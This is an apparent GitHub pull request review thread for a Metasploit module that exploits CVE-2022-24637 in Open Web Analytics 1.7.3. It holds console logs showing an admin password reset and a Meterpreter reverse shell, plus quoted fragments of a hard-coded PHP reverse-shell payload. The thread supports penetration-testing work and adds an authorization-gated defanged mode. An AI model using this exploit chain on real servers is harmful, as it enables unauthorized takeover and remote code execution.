Open web analytics 1.7.3 remote code execution
rapid7/metasploit-framework pull request #17754
Opened 2023-03-09 13:20 UTC by Pflegusch

This adds an exploit for [CVE-2022-24637](https://nvd.nist.gov/vuln/detail/CVE-2022-24637) which is a Remote Code Execution vulnerability for [Open Web Analytics](https://github.com/Open-Web-Analytics/Open-Web-Analytics) for versions below [1.7.4](https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4). This exploit works because files generated with `'<?php (instead of the intended "<?php sequence)` aren't handled by the PHP interpreter.

## Verification Steps
- [ ] Start a vulnerable instance of Open Web Analytics using docker and proceed with the installation
- [ ] Start msfconsole
- [ ] Run: use exploit/multi/http/open_web_analytics_rce
- [ ] Set `RHOST`, `RPORT`, `SSL`, `LHOST`, `Password`, `Username` and `SearchLimit`
- [ ] Check the target with `check`
- [ ] Run the exploit with `run`

## Example
```
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run

[*] Started reverse TCP handler on 172.22.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!

meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >
```

2023-03-09 13:37 UTC, bcoles commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +      res = Net::HTTP.get_response(URI.parse(url))
Please use `send_request_cgi`.

2023-03-09 13:37 UTC, bcoles commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  end
```suggestion
  def check
    res = etablish_connection

    return CheckCode::Unknown('Connection failed') unless res

    return CheckCode::Safe unless !res.body.include?('Open Web Analytics')
      
    version = res.body.scan(/version=([\d.]+)/).flatten.first

    return CheckCode::Detected("Open Web Analytics #{version} detected") unless version == '1.7.3'

    CheckCode::Appears("Open Web Analytics #{version} is vulnerable")
  end
```

2023-03-09 13:37 UTC, bcoles commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    reverse_shell = "/*<?php /**/ error_reporting(0); $ip = '#{datastore['LHOST']}'; $port = #{datastore['LPORT']}; \
Metasploit payloads should be used rather than hard-coded payloads.

2023-03-09 13:37 UTC, bcoles commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    log_location = '/var/www/html/owa-data/caches/' + shell_filename
Should `/var/www/html/` be configurable via module option?

2023-03-09 13:43 UTC, Pflegusch commented
@bcoles Thanks for the quick feedback, I will look into your suggestions and will update the module accordingly.

2023-03-09 15:36 UTC, smcintyre-r7 commented on documentation/modules/exploit/multi/http/open_web_analytics_rce.md
> +## Vulnerable Application
A comment for this entire file.

Per the markdown spec, string literals that do not span multiple lines should be enclosed in single back ticks ``` ` ```.

Literals that span multiple lines should be enclosed in triple back ticks that is 3 and not 4 as you're using here.

2023-03-09 15:36 UTC, smcintyre-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    base_url = get_normalized_url(datastore['RHOSTS'])
This should be using the [`#full_uri`](https://github.com/rapid7/metasploit-framework/blob/350984bc41fe9698f0d7bec16451c25aa14f0158/lib/msf/core/exploit/remote/http_client.rb#L555) method.

There's alot of different things that `datastore['RHOSTS']` can be and this way you can remove `#get_normalized_url`.

2023-03-09 15:36 UTC, smcintyre-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  def etablish_connection
Also while this method establishes a connection, once it's been switched to `#send_request_cgi` that connection won't be maintained after the function returns. It returns an HTTP response, so calling this `establish_connection` isn't a good representation of what it is actually done.

2023-03-09 15:36 UTC, smcintyre-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  def get_proxy_protocol(url)
You should remove this method since it's not called anywhere.

2023-03-09 15:36 UTC, smcintyre-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  end
We have a method for this called `#rand_text_alphanumeric`. You should use that and remove this one since it's redundant.

2023-03-09 15:36 UTC, smcintyre-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  end
This should be replaced with [`#full_uri`.](https://github.com/rapid7/metasploit-framework/blob/350984bc41fe9698f0d7bec16451c25aa14f0158/lib/msf/core/exploit/remote/http_client.rb#L555)

2023-03-09 15:36 UTC, smcintyre-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    regex_cache_base64 = /\*(\w*)/
If the `=` are included in this string, they're not getting matched by the `\w`. You could change that so they are included, removing the need to calculate and add them yourself on L273-L274 by changing the regex to:

```
/\*(\w*={0,2})/
```

The `\w` should also be updated to include the additional characters that base64 can include in the encoding such as `+` and `/` depending on the character set/flavor.

2023-03-11 13:52 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +      res = Net::HTTP.get_response(URI.parse(url))
Updated as suggested.

2023-03-11 13:52 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  def etablish_connection
Great catch, updated it to `check_connection` as this is a better representation of what the function does :)

2023-03-11 13:53 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  end
Updated as suggested. Didn't knew about `Rex::Version` before :)

2023-03-11 13:54 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    reverse_shell = "/*<?php /**/ error_reporting(0); $ip = '#{datastore['LHOST']}'; $port = #{datastore['LPORT']}; \
Updated it. I initially tried to make it work with metasploit payloads but couldn't get my head around why my `payload.encoded` code would simply output nothing. Turned out that if you call this in the `check` method, where I tested it the whole time, it won't output anything.

2023-03-11 13:55 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    log_location = '/var/www/html/owa-data/caches/' + shell_filename
Yes, great catch. This path can differ depending on the deployment and it should be configurable. Changed it accordingly.

2023-03-11 13:57 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    base_url = get_normalized_url(datastore['RHOSTS'])
You are correct. I didn't see the `#full_uri` method before but updated it accordingly and removed the `#get_normalized_url` function completely.

2023-03-11 13:58 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  def get_proxy_protocol(url)
Updated it. Great catch, rubocop and my vs code linter didn't seem to catch it, so I missed it.

2023-03-11 13:58 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  end
Updated it.

2023-03-11 13:59 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    regex_cache_base64 = /\*(\w*)/
Great catch! I updated the regex to your suggestion.

2023-03-11 14:04 UTC, Pflegusch commented
Thanks @bcoles and @smcintyre-r7 for the review! As this is my first try of implementing a module into metasploit, I initially struggled a bit with some basics. However, I looked into your suggestions and updated the module accordingly. I tested and verified the module and if you have any other suggestions, let me know :)

2023-03-14 17:55 UTC, cdelafuente-r7 requested changes
Thank you @Pflegusch for this module! This is great!

I left some comments and suggestions for you to review when you got a change. Please, let me know if you have any questions, I'll be happy to help.

2023-03-14 17:55 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    cache_temppass = get_cache_temppass(cache)
What is the temp password exactly? Is it the current user password before it's been changed? If so, I think this is a good idea to try to restore it once the exploit finishes.

2023-03-14 19:01 UTC, Pflegusch commented
@cdelafuente-r7 thanks for the suggestions! I will look into them one by one and will try to apply your suggestions.

2023-03-15 01:29 UTC, Pflegusch commented on documentation/modules/exploit/multi/http/open_web_analytics_rce.md
> +## Verification Steps
Did that, `msftidy_docs.rb` doesnt report any issues anymore

2023-03-15 01:29 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +  require 'base64'
Updated.

2023-03-15 01:32 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    cache_temppass = get_cache_temppass(cache)
The temp password is used to set a new password via the usersChangePassword action, so its not the current user password as that is hashed and therefore not usable. Restoring would indeed be a great idea, but I dont think thats possible here, as we have no way of knowing the original password

2023-03-15 01:39 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +        'owa_config[base.error_log_file]' => log_location,
I can't think of a way to backup the original value sadly. I've looked into ways of retrieving the original value, but I don't think there is one tbh.

2023-03-15 01:41 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +        'owa_config[base.error_log_file]' => log_location,
I will try to find a way to retrieve the original value, but after giving it a first shot earlier I don't think that will be possible.

2023-03-15 01:43 UTC, Pflegusch commented
@cdelafuente-r7 I looked over your suggestions and updated the code accordingly. A few things to note:
- I removed the `Directory` datastore option, as this is not needed. The `log_location` can be retrieved without setting an absolute path and the relative one works perfectly fine. I tested this with different owa installation paths and with this change we can get rid of the `Directory` datastore option. 
- Added the `FileDropper` and `AutoCheck` functionality and tested them both.

The rest are small code changes suggested from you. Thanks again for the code review :) If there are any more suggestions, let me know.

2023-03-15 15:53 UTC, cdelafuente-r7 reviewed
Thanks @Pflegusch for updating this! I just left a few minor suggestions, otherwise it looks good to me.

Just one thing I wanted to point out. Since, apparently, it is not possible to restore the admin password and the configuration to their original state, I would be inclined to used a datastore option that force the module to run in defanged mode by default. A warning message would be displayed to explain the risks and the operator would have to disable this option to execute the module. You can find an example of this [here](https://github.com/rapid7/metasploit-framework/blob/c2c5c0c339e4351ad939df780abae0a0ebbcd23f/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb#L67).

That said, if you think it is okay to run the exploit without warning, I'm also fine with this. It's up to you to implement this logic.

2023-03-15 15:53 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}")
I noticed that, after the session is established, the module hangs for a few seconds before the Meterpreter session gets available to the operator. It looks like this last request doesn't return and the HTTP client keeps waiting for a response. The default timeout is set to [20 seconds](https://github.com/rapid7/metasploit-framework/blob/c2c5c0c339e4351ad939df780abae0a0ebbcd23f/lib/msf/core/exploit/remote/http_client.rb#L428) and this can be customised when calling `send_request_cgi`:
```suggestion
      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}"),
      timeout: 3
```
Decreasing the timeout value should reduce the time between when the session is established and when it becomes available. If you add this, please, make sure it still works in your environment.

2023-03-15 18:01 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +    res
Updated as suggested.

2023-03-15 18:01 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24637' ]
Updated.

2023-03-15 18:03 UTC, Pflegusch commented on modules/exploits/multi/http/open_web_analytics_rce.rb
> +      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}")
Updated. I choose an even lower `timeout` value of `1`, as the session gets available almost immediately and the exploit still works in my environment, locally as well as with HTTPS over the internet on a dedicated server.

2023-03-16 13:08 UTC, Pflegusch commented
> Thanks @Pflegusch for updating this! I just left a few minor suggestions, otherwise it looks good to me.
> 
> Just one thing I wanted to point out. Since, apparently, it is not possible to restore the admin password and the configuration to their original state, I would be inclined to used a datastore option that force the module to run in defanged mode by default. A warning message would be displayed to explain the risks and the operator would have to disable this option to execute the module. You can find an example of this [here](https://github.com/rapid7/metasploit-framework/blob/c2c5c0c339e4351ad939df780abae0a0ebbcd23f/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb#L67).
> 
> That said, if you think it is okay to run the exploit without warning, I'm also fine with this. It's up to you to implement this logic.

Running the exploit in a defanged mode sounds good to me, as it's probably a good idea to warn the user that running this exploit will do some irreversible changes (e.g changing the password of a user) to the target system. I will implement that logic later on. Thanks for the idea  @cdelafuente-r7!

2023-03-16 17:09 UTC, Pflegusch commented
@cdelafuente-r7 Implemented the `DefangedMode` datastore option. Let me know what you think of it, I pretty much just went with the [example](https://github.com/rapid7/metasploit-framework/blob/c2c5c0c339e4351ad939df780abae0a0ebbcd23f/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb#L67) on this one :)

2023-03-17 09:14 UTC, cdelafuente-r7 commented
Thank you @Pflegusch! Everything looks good to me now. I tested using Docker and it works great. I'll go ahead and land it. Thanks again for your contribution.

### Example Output
```
msf6 exploit(multi/http/open_web_analytics_rce) > run verbose=true rhosts=127.0.0.1 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[-] Exploit aborted due to failure: bad-config:

Are you SURE you want to execute the exploit against the target system?
Running this exploit will change user passwords and config files of the
target system.

Disable the DefangedMode option if you have authorization to proceed.

[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/open_web_analytics_rce) > run verbose=true rhosts=127.0.0.1 lhost=192.168.100.1 defangedmode=false

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 30195fabe06b993505d7aa74d9477c95
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 192.168.100.1
[+] Deleted 0t9lnvec.php
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.1:60778) at 2023-03-17 10:09:28 +0100
[+] Triggering payload! Check your listener!

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : d35161c07b73
OS          : Linux d35161c07b73 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
Meterpreter : php/linux
```

2023-03-17 09:15 UTC, cdelafuente-r7 approved these changes

2023-03-17 09:41 UTC, merged

2023-03-17 10:14 UTC, cdelafuente-r7 commented
# Release Notes

This adds an exploit module for CVE-2022-24637, a single/double quote confusion vulnerability in Open Web Analytics versions below 1.7.4. This leads to the disclosure of sensitive information in an automatically generated PHP cache file, which can be leveraged to gain admin privileges and remote code execution.